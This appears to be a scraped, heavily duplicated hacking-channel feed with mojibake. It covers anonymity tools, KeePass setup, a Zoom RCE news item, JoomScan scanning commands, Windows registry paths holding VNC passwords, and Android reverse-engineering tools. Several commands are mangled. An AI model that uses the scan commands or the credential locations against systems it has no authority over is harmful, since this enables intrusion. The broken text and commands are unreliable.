β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ What to choose: Whonix, Tails, Tor Browser ... :
1οΈβ£Whonix is not the only operating system for anonymity. Another analog is Tails . Like Whonix , Tails also uses Tor , so the question may be: is Tor better than the Tor browser ?
2οΈβ£ Choosing a tool for anonymity is more dependent on your needs.
3οΈβ£Tor browser will be enough if you want to bypass site blocking or want to hide your IP address in non-critical situations.
4οΈβ£The Tails operating system is designed for situations where it is not only critical to maintain anonymity, but also in the case of physical seizure of a computer, making it impossible to collect evidence. For this, for example, in Tails, it is impossible to save files other than on specially created encrypted storage. Program and operating system settings, as well as the history of any activity, are also not saved by default. To enable this, you need to read the instructions - safely, but not conveniently. In practice, many users do not need such measures. See also the Tails Guide
5οΈβ£Whonix focuses on ensuring anonymity - in fact, Whonix is broken down into 2 operating systems. One of them is a gateway through which Internet access is performed. And the second is a workstation. Thanks to this approach, even if the workstation is hacked and the attacker has a superuser password from it, it will be impossible to find out the user's IP address. This is achieved by the fact that the Whonix workstation in the properties of the virtual machine is configured to access the Internet only through the gateway - these settings cannot be changed from the virtual machine. Therefore, even if a hacker can change the settings inside Whonix, the maximum that he can achieve is to spoil the settings and make it impossible to access the Internet, but not to compromise IP.
6οΈβ£At the same time, you can work and save files in Whonix as in any ordinary operating system. That is, Whonix is aimed at anonymity, but not at counteracting the collection of electronic evidence.
π¦What version of Whonix to download
> To run Whonix, you need a free program for working with virtual machines - VirtualBox .
> To broaden your horizons , the VirtualBox Manual is recommended. At a minimum, read about installing this program on your operating system:
1) Install VirtualBox on Windows/Linux
2) Go to the Whonix download page on the official website: https://www.whonix.org/wiki/Download
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ What to choose: Whonix, Tails, Tor Browser ... :
1οΈβ£Whonix is not the only operating system for anonymity. Another analog is Tails . Like Whonix , Tails also uses Tor , so the question may be: is Tor better than the Tor browser ?
2οΈβ£ Choosing a tool for anonymity is more dependent on your needs.
3οΈβ£Tor browser will be enough if you want to bypass site blocking or want to hide your IP address in non-critical situations.
4οΈβ£The Tails operating system is designed for situations where it is not only critical to maintain anonymity, but also in the case of physical seizure of a computer, making it impossible to collect evidence. For this, for example, in Tails, it is impossible to save files other than on specially created encrypted storage. Program and operating system settings, as well as the history of any activity, are also not saved by default. To enable this, you need to read the instructions - safely, but not conveniently. In practice, many users do not need such measures. See also the Tails Guide
5οΈβ£Whonix focuses on ensuring anonymity - in fact, Whonix is broken down into 2 operating systems. One of them is a gateway through which Internet access is performed. And the second is a workstation. Thanks to this approach, even if the workstation is hacked and the attacker has a superuser password from it, it will be impossible to find out the user's IP address. This is achieved by the fact that the Whonix workstation in the properties of the virtual machine is configured to access the Internet only through the gateway - these settings cannot be changed from the virtual machine. Therefore, even if a hacker can change the settings inside Whonix, the maximum that he can achieve is to spoil the settings and make it impossible to access the Internet, but not to compromise IP.
6οΈβ£At the same time, you can work and save files in Whonix as in any ordinary operating system. That is, Whonix is aimed at anonymity, but not at counteracting the collection of electronic evidence.
π¦What version of Whonix to download
> To run Whonix, you need a free program for working with virtual machines - VirtualBox .
> To broaden your horizons , the VirtualBox Manual is recommended. At a minimum, read about installing this program on your operating system:
1) Install VirtualBox on Windows/Linux
2) Go to the Whonix download page on the official website: https://www.whonix.org/wiki/Download
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
Whonix
Download Whonix (FREE)
FREE Download Whonix. Privacy Protection. Anonymity Online. For Windows, macOS, Linux.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Which password manager to choose. What is better KeePass, KeePassX or KeePassXC
> There are many password managers. It is worth choosing the one with the source code open (which allows you to make sure that your passwords will not be sent to the attacker and / or there are no bookmarks in the encryption algorithm).
> One of the popular, well-established is KeePass . Initially, this program was written for Windows, but with Mono (an open implementation of the .NET platform, including a working environment and a compiler), it also works on Linux, Mac OS X.
KeePass has two popular branches:
1) KeePassX is a cross-platform program, with a branch there were some advantages over KeePass, now development has slowed down
2) KeePassXC - another cross-platform fork, also had some advantages, but at present it functions the same as KeePass. Small advantages - the Russian language is already built-in and does not require additional installation (as needed in KeePass). Also, the program is initially cross-platform and looks the same in any operating system. While KeePass looks a little different, due to the fact that different platforms use the original .NET environment or its open analogue Mono
> All three of these programs have mutually compatible databases.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£wget
2οΈβ£unzip KeePass - * - Russian.zip
3οΈβ£rm KeePass - * - Russian.zip
4οΈβ£sudo mkdir / usr / share / keepass / Languages
5οΈβ£sudo mv Russian.lngx / usr / share / keepass / Languages
keepass
6οΈβ£How to create a KeePass database
> The principle of the password manager is that all data (logins and passwords) is encrypted and stored in one database. You can select any name and any location of the database file. It is recommended that you back it up regularly.
> Databases can be any number.
7οΈβ£To transfer all encrypted passwords to another computer, just copy the database file (everything is stored in one file).
As you can see, most of the functions in the interface are inactive, until the database is created, click the " Create " icon :
π¦for windows To download KeePass, go to the official website: https://keepass.info/download.html
enjoy
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Which password manager to choose. What is better KeePass, KeePassX or KeePassXC
> There are many password managers. It is worth choosing the one with the source code open (which allows you to make sure that your passwords will not be sent to the attacker and / or there are no bookmarks in the encryption algorithm).
> One of the popular, well-established is KeePass . Initially, this program was written for Windows, but with Mono (an open implementation of the .NET platform, including a working environment and a compiler), it also works on Linux, Mac OS X.
KeePass has two popular branches:
1) KeePassX is a cross-platform program, with a branch there were some advantages over KeePass, now development has slowed down
2) KeePassXC - another cross-platform fork, also had some advantages, but at present it functions the same as KeePass. Small advantages - the Russian language is already built-in and does not require additional installation (as needed in KeePass). Also, the program is initially cross-platform and looks the same in any operating system. While KeePass looks a little different, due to the fact that different platforms use the original .NET environment or its open analogue Mono
> All three of these programs have mutually compatible databases.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£wget
curl -s https://keepass.info/translations.html | grep -o -E 'https://downloads.sourceforge.net/keepass/KeePass[0-9.-β +Russian.zip' | tail -n 1
(avaible also in english)2οΈβ£unzip KeePass - * - Russian.zip
3οΈβ£rm KeePass - * - Russian.zip
4οΈβ£sudo mkdir / usr / share / keepass / Languages
5οΈβ£sudo mv Russian.lngx / usr / share / keepass / Languages
keepass
6οΈβ£How to create a KeePass database
> The principle of the password manager is that all data (logins and passwords) is encrypted and stored in one database. You can select any name and any location of the database file. It is recommended that you back it up regularly.
> Databases can be any number.
7οΈβ£To transfer all encrypted passwords to another computer, just copy the database file (everything is stored in one file).
As you can see, most of the functions in the interface are inactive, until the database is created, click the " Create " icon :
π¦for windows To download KeePass, go to the official website: https://keepass.info/download.html
enjoy
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
keepass.info
Downloads - KeePass
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦AGAIN Zoom reveals a remote code execution vulnerability that only affects Windows 7 and below
#NEWS
> Security researchers discovered a remote code execution vulnerability in the Windows Zoom client. From the current perspective, only systems with Windows 7 installed will be truly exposed to risks. Before Zoom actually solved the vulnerability, security company 0patch first released a micro-patch for the vulnerability. The company explained that the vulnerability is high in risk, and the remote attacker only needs to persuade the user to perform a simple action, such as opening One file can exploit this vulnerability.
> Once the malicious file is loaded, the attacker can launch an RCE attack without any warning displayed on the victim's computer. Although the vulnerability exists in all Windows versions of the Zoom client, only Windows 7 computers will be threatened.
"This vulnerability can only be exploited on Windows 7 and earlier versions of Windows. It is likely to be exploited on Windows Server 2008 R2 and earlier versions, although we have not tested it; but no matter which system, our micro-patch Will protect you, no matter where you use the Zoom Client," 0patch pointed out.
Subsequently, Zoom fixed this bug in version 5.1.3 of its Windows client. Users who previously installed the micropatches released by 0patch do not need to do anything when applying the official repair version of Zoom, because the micropatches themselves will automatically fail.
> This vulnerability shows how important it is to always run a supported version of Windows. Official support for Windows 7 ended in January this year, which means that this operating system from 2009 can no longer obtain any new updates and security patches from Microsoft . Additional fixes are shipped through customized security updates (available for a fee) or using third-party products such as 0patch.
#NEWS @UNDERCODENEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦AGAIN Zoom reveals a remote code execution vulnerability that only affects Windows 7 and below
#NEWS
> Security researchers discovered a remote code execution vulnerability in the Windows Zoom client. From the current perspective, only systems with Windows 7 installed will be truly exposed to risks. Before Zoom actually solved the vulnerability, security company 0patch first released a micro-patch for the vulnerability. The company explained that the vulnerability is high in risk, and the remote attacker only needs to persuade the user to perform a simple action, such as opening One file can exploit this vulnerability.
> Once the malicious file is loaded, the attacker can launch an RCE attack without any warning displayed on the victim's computer. Although the vulnerability exists in all Windows versions of the Zoom client, only Windows 7 computers will be threatened.
"This vulnerability can only be exploited on Windows 7 and earlier versions of Windows. It is likely to be exploited on Windows Server 2008 R2 and earlier versions, although we have not tested it; but no matter which system, our micro-patch Will protect you, no matter where you use the Zoom Client," 0patch pointed out.
Subsequently, Zoom fixed this bug in version 5.1.3 of its Windows client. Users who previously installed the micropatches released by 0patch do not need to do anything when applying the official repair version of Zoom, because the micropatches themselves will automatically fail.
> This vulnerability shows how important it is to always run a supported version of Windows. Official support for Windows 7 ended in January this year, which means that this operating system from 2009 can no longer obtain any new updates and security patches from Microsoft . Additional fixes are shipped through customized security updates (available for a fee) or using third-party products such as 0patch.
#NEWS @UNDERCODENEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Do I need to obfuscate JavaScript ?
#FastTips
> JavaScript code works in web browsers of users and is available to them for study and other actions. If you asked yourself the question βWhy should I obfuscate my JavaScript code?β, There are many reasons why it is recommended to protect the code, for example:
1) Do not let anyone just copy / paste your work. This is especially important for 100% client projects such as HTML5 games;
2) Removing comments and spaces that are not needed. Faster downloads and increased difficulty to understand;
3) Protection of works that have not yet been paid. You can show your work to the client, knowing that he will not have the source code until the bill is paid;
4) Protection against site proxies, proxy programs can change all internal links, thanks to obfuscation JavaScript can be protected from automatic parsers.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Do I need to obfuscate JavaScript ?
#FastTips
> JavaScript code works in web browsers of users and is available to them for study and other actions. If you asked yourself the question βWhy should I obfuscate my JavaScript code?β, There are many reasons why it is recommended to protect the code, for example:
1) Do not let anyone just copy / paste your work. This is especially important for 100% client projects such as HTML5 games;
2) Removing comments and spaces that are not needed. Faster downloads and increased difficulty to understand;
3) Protection of works that have not yet been paid. You can show your work to the client, knowing that he will not have the source code until the bill is paid;
4) Protection against site proxies, proxy programs can change all internal links, thanks to obfuscation JavaScript can be protected from automatic parsers.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦JOMLA WEB-HACKING :
OWASP Joomla! Vulnerability Scanner (JoomScan) is an open source project, developed with the aim of automating the task of vulnerability detection and reliability assurance in Joomla CMS deployments. Implemented in Perl, this tool enables seamless and effortless scanning of Joomla installations, while leaving a minimal footprint with its lightweight and modular architecture. It not only detects known offensive vulnerabilities, but also is able to detect many misconfigurations and admin-level shortcomings that can be exploited by adversaries to compromise the system. Furthermore, OWASP JoomScan provides a user-friendly interface and compiles the final reports in both text and HTML formats for ease of use and minimization of reporting overheads.
OWASP JoomScan is included in Kali Linux distributions.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
# Build the docker image
docker build -t rezasp/joomscan .
# Run a new docker container with reports directory mounted at the host
docker run -it -v /path/to/reports:/home/joomscan/reports --name joomscan_cli rezasp/joomscan
5οΈβ£ For accessing the docker container you can run the following command
docker run -it -v /path/to/reports:/home/joomscan/reports --name joomscan_cli --entrypoint /bin/bash rezasp/joomscan
6οΈβ£Do default checks...
perl joomscan.pl --url www.example.com
or
perl joomscan.pl -u www.example.com
7οΈβ£Enumerate installed components...
perl joomscan.pl --url www.example.com --enumerate-components
or
perl joomscan.pl -u www.example.com --ec
Set cookie
perl joomscan.pl --url www.example.com --cookie "test=demo;"
Set user-agent
perl joomscan.pl --url www.example.com --user-agent "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
or
π¦FEATURES :
Automated ...
*Version enumerator
*Vulnerability enumerator (based on version)
*Components enumerator (1209 most popular by default)
*Components vulnerability enumerator (based on version)(+1030 exploit)
*Firewall detector
*Reporting to Text & HTML output
*Finding common log files
*Finding common backup files
enjoyβ€οΈππ»
β Topic git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦JOMLA WEB-HACKING :
OWASP Joomla! Vulnerability Scanner (JoomScan) is an open source project, developed with the aim of automating the task of vulnerability detection and reliability assurance in Joomla CMS deployments. Implemented in Perl, this tool enables seamless and effortless scanning of Joomla installations, while leaving a minimal footprint with its lightweight and modular architecture. It not only detects known offensive vulnerabilities, but also is able to detect many misconfigurations and admin-level shortcomings that can be exploited by adversaries to compromise the system. Furthermore, OWASP JoomScan provides a user-friendly interface and compiles the final reports in both text and HTML formats for ease of use and minimization of reporting overheads.
OWASP JoomScan is included in Kali Linux distributions.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£git clone https://github.com/rezasp/joomscan.git4οΈβ£ For Docker installation and usage
2οΈβ£cd joomscan
3οΈβ£perl joomscan.pl
# Build the docker image
docker build -t rezasp/joomscan .
# Run a new docker container with reports directory mounted at the host
docker run -it -v /path/to/reports:/home/joomscan/reports --name joomscan_cli rezasp/joomscan
5οΈβ£ For accessing the docker container you can run the following command
docker run -it -v /path/to/reports:/home/joomscan/reports --name joomscan_cli --entrypoint /bin/bash rezasp/joomscan
6οΈβ£Do default checks...
perl joomscan.pl --url www.example.com
or
perl joomscan.pl -u www.example.com
7οΈβ£Enumerate installed components...
perl joomscan.pl --url www.example.com --enumerate-components
or
perl joomscan.pl -u www.example.com --ec
Set cookie
perl joomscan.pl --url www.example.com --cookie "test=demo;"
Set user-agent
perl joomscan.pl --url www.example.com --user-agent "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
or
π¦FEATURES :
Automated ...
*Version enumerator
*Vulnerability enumerator (based on version)
*Components enumerator (1209 most popular by default)
*Components vulnerability enumerator (based on version)(+1030 exploit)
*Firewall detector
*Reporting to Text & HTML output
*Finding common log files
*Finding common backup files
enjoyβ€οΈππ»
β Topic git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST HACKING PROGRAMMING LANGUAGES:
#ForBeginers
1. Python
Python is one of the more commonly used programming languages ββfor developers. Many large enterprises choose Python for product development, such as: NASA, Google, Instagram, Spotify, Uber, Netflix, etc., and it is very wonderful that both beginners and professionals like Python, so it can be seen Popularity. If you are a technical professional in the big data profession, then Python is arguably the most suitable.
2. R
R is a language that can be easily connected to a database management system (DBMS), but in fact it does not provide any spreadsheet data view. However, the larger feature of R language is that it provides a variety of graphical functions for data representation, such as bar charts, pie charts, time series, point charts, 3D surfaces, image charts, maps, scatter charts, and so on. The R language can help users easily customize graphics and develop novel graphics with characteristics.
3. Java
After Java appeared, it was widely known for its versatility in data science and technology. Moreover, the open source framework Hadoop HDFS for processing and storing big data applications has been written entirely in Java. Java is also widely used to build various ETL applications, such as Apache, Apache Kafka, and Apache Camel. These applications are used to run data extraction, data conversion, and loading in a big data environment.
4. Scala
Scala is an open source high-level programming language, currently mainly used in the financial industry. A relatively large feature of Scala is its importance in ensuring the availability of big data. In short, Apache Spark is a cluster computing framework for big data applications. Big data practitioners generally need to have extensive knowledge and operational experience related to Scala.
5. Kotlin
Kotlin is a very good Android application development language that can run on the JVM. To some extent, it overcomes some of the shortcomings of Java and provides many modern functions. The main feature of Kotlin is its language design, which provides excellent pointers, security, type inference and other functions. The huge ecosystem of existing Java libraries is available for Kotlin, because Kotlin also runs in the JVM.
6. Go
The Go programming language has great concurrency support. Go uses "Goroutine" (lightweight green thread) and "Channel" for messaging. It does not provide "shared memory" concurrency through threads and locks, because in this case, programming will be more difficult. But it provides CSP-based messaging concurrency.
Go's favorite feature is simplicity. Novice developers can use it to write efficient code in just a few days, which is actually very similar to Python. Moreover, some large-scale cloud-native projects are also written in Go.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST HACKING PROGRAMMING LANGUAGES:
#ForBeginers
1. Python
Python is one of the more commonly used programming languages ββfor developers. Many large enterprises choose Python for product development, such as: NASA, Google, Instagram, Spotify, Uber, Netflix, etc., and it is very wonderful that both beginners and professionals like Python, so it can be seen Popularity. If you are a technical professional in the big data profession, then Python is arguably the most suitable.
2. R
R is a language that can be easily connected to a database management system (DBMS), but in fact it does not provide any spreadsheet data view. However, the larger feature of R language is that it provides a variety of graphical functions for data representation, such as bar charts, pie charts, time series, point charts, 3D surfaces, image charts, maps, scatter charts, and so on. The R language can help users easily customize graphics and develop novel graphics with characteristics.
3. Java
After Java appeared, it was widely known for its versatility in data science and technology. Moreover, the open source framework Hadoop HDFS for processing and storing big data applications has been written entirely in Java. Java is also widely used to build various ETL applications, such as Apache, Apache Kafka, and Apache Camel. These applications are used to run data extraction, data conversion, and loading in a big data environment.
4. Scala
Scala is an open source high-level programming language, currently mainly used in the financial industry. A relatively large feature of Scala is its importance in ensuring the availability of big data. In short, Apache Spark is a cluster computing framework for big data applications. Big data practitioners generally need to have extensive knowledge and operational experience related to Scala.
5. Kotlin
Kotlin is a very good Android application development language that can run on the JVM. To some extent, it overcomes some of the shortcomings of Java and provides many modern functions. The main feature of Kotlin is its language design, which provides excellent pointers, security, type inference and other functions. The huge ecosystem of existing Java libraries is available for Kotlin, because Kotlin also runs in the JVM.
6. Go
The Go programming language has great concurrency support. Go uses "Goroutine" (lightweight green thread) and "Channel" for messaging. It does not provide "shared memory" concurrency through threads and locks, because in this case, programming will be more difficult. But it provides CSP-based messaging concurrency.
Go's favorite feature is simplicity. Novice developers can use it to write efficient code in just a few days, which is actually very similar to Python. Moreover, some large-scale cloud-native projects are also written in Go.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Warning : all windows 10 users Special 2019 version and lower;
should update their Systems β
Xp3 the old system sometimes more secure than Win 10 2019π
should update their Systems β
Xp3 the old system sometimes more secure than Win 10 2019π
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Where Windows Store VNC Passwords ?
#fastTips
VNC passwords in Windows are stored in the registry in the following branches (the list may be incomplete):
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ TigerVNC \ WinVNC4
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ TightVNC \ Server
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ ORL \ WinVNC3 \ Default
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ RealVNC \ WinVNC4 \
\ HKEY_CURRENT_USER \ Software \ TightVNC
\ HKEY_CURRENT_USER \ Software \ TurboVNC
\ HKEY_CURRENT_USER \ Software \ ORL \ WinVNC3 \ Password
\ HKEY_USERS \ .DEFAULT \ Software \ ORL \ WinVNC3 \ Password
> The password is stored in binary form, its length is 8 bytes.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Where Windows Store VNC Passwords ?
#fastTips
VNC passwords in Windows are stored in the registry in the following branches (the list may be incomplete):
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ TigerVNC \ WinVNC4
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ TightVNC \ Server
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ ORL \ WinVNC3 \ Default
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ RealVNC \ WinVNC4 \
\ HKEY_CURRENT_USER \ Software \ TightVNC
\ HKEY_CURRENT_USER \ Software \ TurboVNC
\ HKEY_CURRENT_USER \ Software \ ORL \ WinVNC3 \ Password
\ HKEY_USERS \ .DEFAULT \ Software \ ORL \ WinVNC3 \ Password
> The password is stored in binary form, its length is 8 bytes.
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Featuresd for detect a Tcp connections :
> NS - bit 103. ECN-nonce - concealment protection
> CWR (Congestion Window Reduced) - bit 104. Field βCongestion Window Reducedβ - the flag is set by the sender to indicate that a packet has been received with the ECE flag set
> ECE - bit 105. ECE (ECN-Echo) - Field βECN Echoβ - indicates that this node is capable of ECN (explicit notification of congestion) and to indicate to the sender about network congestion (RFC 3168)
> URG - bit 106. The "Importance Index" field is enabled. If set to 0, Urgent Pointer is not used; if set to 1, then Urgent Pointer is used.
>ACK is bit 107. This bit is set for a packet to indicate that this is a response to another packet we received that contains data. A confirmation package is always sent to indicate that we actually received the package and that it does not contain errors. If this bit is set, the original data sender will check the confirmation number to see which packet is actually acknowledged, and then unload it from the buffers.
> PSH - bit 108. The PUSH flag is used to instruct the TCP protocol on any intermediate hosts to send data to the actual user, including the TCP implementation on the receiving host.
>
This will push through all the data, no matter where and how much from the TCP window has already been transmitted.
> RST - bit 109. The RESET flag is set to tell the other end to disconnect the TCP connection. This is done in several different scenarios, the main reasons for which is that the connection was disconnected for some reason, if the connection does not exist or if the packet is somehow wrong.
>SYN - bit 110. SYN (or sequence number synchronization) is used during the initial connection establishment. It is installed in two connection instances: the initial packet that opens the connection, and the response SYN / ACK packet. It should never be used outside of these cases.
> FIN is bit 111. The FIN bit indicates that the host that sent the FIN bit no longer has data to send. When the other end sees the FIN bit, it will reply FIN / ACK. Once this is done, the host that originally sent the FIN bit will no longer be able to send any data. However, the other end may continue to send data until it completes, and then sends the FIN packet back and waits for the final FIN / ACK, after which the connection is sent to the CLOSED state.
written by under code
powered by wiki
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Featuresd for detect a Tcp connections :
> NS - bit 103. ECN-nonce - concealment protection
> CWR (Congestion Window Reduced) - bit 104. Field βCongestion Window Reducedβ - the flag is set by the sender to indicate that a packet has been received with the ECE flag set
> ECE - bit 105. ECE (ECN-Echo) - Field βECN Echoβ - indicates that this node is capable of ECN (explicit notification of congestion) and to indicate to the sender about network congestion (RFC 3168)
> URG - bit 106. The "Importance Index" field is enabled. If set to 0, Urgent Pointer is not used; if set to 1, then Urgent Pointer is used.
>ACK is bit 107. This bit is set for a packet to indicate that this is a response to another packet we received that contains data. A confirmation package is always sent to indicate that we actually received the package and that it does not contain errors. If this bit is set, the original data sender will check the confirmation number to see which packet is actually acknowledged, and then unload it from the buffers.
> PSH - bit 108. The PUSH flag is used to instruct the TCP protocol on any intermediate hosts to send data to the actual user, including the TCP implementation on the receiving host.
>
This will push through all the data, no matter where and how much from the TCP window has already been transmitted.
> RST - bit 109. The RESET flag is set to tell the other end to disconnect the TCP connection. This is done in several different scenarios, the main reasons for which is that the connection was disconnected for some reason, if the connection does not exist or if the packet is somehow wrong.
>SYN - bit 110. SYN (or sequence number synchronization) is used during the initial connection establishment. It is installed in two connection instances: the initial packet that opens the connection, and the response SYN / ACK packet. It should never be used outside of these cases.
> FIN is bit 111. The FIN bit indicates that the host that sent the FIN bit no longer has data to send. When the other end sees the FIN bit, it will reply FIN / ACK. Once this is done, the host that originally sent the FIN bit will no longer be able to send any data. However, the other end may continue to send data until it completes, and then sends the FIN packet back and waits for the final FIN / ACK, after which the connection is sent to the CLOSED state.
written by under code
powered by wiki
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦analyze and reverse engineer Android applications.
F E A T U R E S :
> Displays all extracted files for easy reference
> Automatically decompile APK files to Java and Smali format
>Analyze AndroidManifest.xml for common vulnerabilities and behavior
>Static source code analysis for common vulnerabilities and behavior
Device info
Intents
Command execution
SQLite references
Logging references
Content providers
Broadcast recievers
Service references
File references
Crypto references
Hardcoded secrets
URL's
Network connections
SSL references
WebView references
-TERMUX / lINUX
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£git clone https://github.com/1N3/ReverseAPK.git
2οΈβ£cd ReverseAPK
3οΈβ£./install
4οΈβ£to use
> reverse-apk <apk_name>
That's all !
ENJOYβ€οΈππ»
β topic git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦analyze and reverse engineer Android applications.
F E A T U R E S :
> Displays all extracted files for easy reference
> Automatically decompile APK files to Java and Smali format
>Analyze AndroidManifest.xml for common vulnerabilities and behavior
>Static source code analysis for common vulnerabilities and behavior
Device info
Intents
Command execution
SQLite references
Logging references
Content providers
Broadcast recievers
Service references
File references
Crypto references
Hardcoded secrets
URL's
Network connections
SSL references
WebView references
-TERMUX / lINUX
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£git clone https://github.com/1N3/ReverseAPK.git
2οΈβ£cd ReverseAPK
3οΈβ£./install
4οΈβ£to use
> reverse-apk <apk_name>
That's all !
ENJOYβ€οΈππ»
β topic git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - 1N3/ReverseAPK: Quickly analyze and reverse engineer Android packages
Quickly analyze and reverse engineer Android packages - GitHub - 1N3/ReverseAPK: Quickly analyze and reverse engineer Android packages
Forwarded from WEB UNDERCODE - PRIVATE
Wordpress_Plugin_Powie's_WHOIS_Domain_Check_0_9_31_Persistent_Cross.txt
5.3 KB
2020 interesting cve Wordpress Plugin Powie's WHOIS Domain Check 0.9.31 - Persistent Cross-Site Scripting
-Leaked then uploaded to cve site
-Leaked then uploaded to cve site
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Changes of Linux network data forwarding plane-from kernel protocol stack to DPDK/XDP
> To the effect that, with the evolution of IO devices, their access / transmission rate has exceeded the CPU-to-memory storage / transmission rate, could no longer slow peripherals , so, the management of these devices and fast In order to adapt to changes in operation, in this sense, the almost unchanging Linux kernel does hinder performance optimization in many ways.
> This may be the essential reason why people are now turning to DPDK/netmap or XDP. how to say?
In the impression of people, a standard computer contains three major pieces:
1) CPU, the central processing unit.
2) The memory is suspended on a chip similar to the North Bridge.
Peripherals, slow IO devices, are suspended on a chip similar to the South Bridge.
3) This is what we learned in the course "The Principle of Computer Composition". In fact, this is the reality of the computer, so the child, according to von Neumann computer abstract point of view, does not contain computer peripherals, it is only the CPU and memory, emphasizing storage and execution, is stored execution of a computer.
π¦With the actual computer composition, the next step is to design an operating system to manage these things. In fact, almost any operating system can be divided into different modules according to this pile of things:
1) Process management, managing CPU time-sharing and scheduling.
2) Memory management, manage memory allocation.
3) File system to manage file organization.
4) Network protocol stack to manage network IO.
5) Disk drive,...
β¦
π¦In fact, from the beginning, called on the name of the object in addition to the CPU, memory, peripherals (disk is a sense), and connect it to the relatively slow bridge chip, is the assumption behind relative to the CPU and memory, these The IO device is slow.
> Therefore, in order to manage these slow devices, the operating system has to design a complicated mechanism for rate adaptation, data caching, etc., whether it is Unix/Linux or Windows, are designed under this assumption.
However, things are quietly changing, and peripherals are gradually becoming faster and more intelligent. They are almost the same as CPUs. More and more peripherals have built-in memory chips, just like another group of CPU/memory hanging on the same block On the motherboard...
π¦At this time, the operating system should be more suitable as a coordinator, and no longer suitable for continuing to be a manager, but the complex management mechanisms of the old era still exist. Take the network protocol stack as an example:
1) The synchronization overhead of various linked lists in a multi-CPU environment.
2) The non-sleepable soft interrupt path is too long.
3) The allocation and release of sk_buff.
4) Memory copy overhead.
5) Cache miss caused by context switching.
β¦
6) Clearly, these mechanisms slow age 10Mbps / 100Mbps network card is no problem, at that time the application most of the time waiting for the card to send data. Now in the era of 1000Mbps/10Gbps/40Gbps network cards, the reverse is true. The data is quickly received, but it is all blocked in the core.
π¦Therefore, various optimization measures should come with the demand:
1) Network card RSS, multiple queues.
2) Interrupt threading.
3) Split lock granularity.
4) Busypoll.
Share usβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Changes of Linux network data forwarding plane-from kernel protocol stack to DPDK/XDP
> To the effect that, with the evolution of IO devices, their access / transmission rate has exceeded the CPU-to-memory storage / transmission rate, could no longer slow peripherals , so, the management of these devices and fast In order to adapt to changes in operation, in this sense, the almost unchanging Linux kernel does hinder performance optimization in many ways.
> This may be the essential reason why people are now turning to DPDK/netmap or XDP. how to say?
In the impression of people, a standard computer contains three major pieces:
1) CPU, the central processing unit.
2) The memory is suspended on a chip similar to the North Bridge.
Peripherals, slow IO devices, are suspended on a chip similar to the South Bridge.
3) This is what we learned in the course "The Principle of Computer Composition". In fact, this is the reality of the computer, so the child, according to von Neumann computer abstract point of view, does not contain computer peripherals, it is only the CPU and memory, emphasizing storage and execution, is stored execution of a computer.
π¦With the actual computer composition, the next step is to design an operating system to manage these things. In fact, almost any operating system can be divided into different modules according to this pile of things:
1) Process management, managing CPU time-sharing and scheduling.
2) Memory management, manage memory allocation.
3) File system to manage file organization.
4) Network protocol stack to manage network IO.
5) Disk drive,...
β¦
π¦In fact, from the beginning, called on the name of the object in addition to the CPU, memory, peripherals (disk is a sense), and connect it to the relatively slow bridge chip, is the assumption behind relative to the CPU and memory, these The IO device is slow.
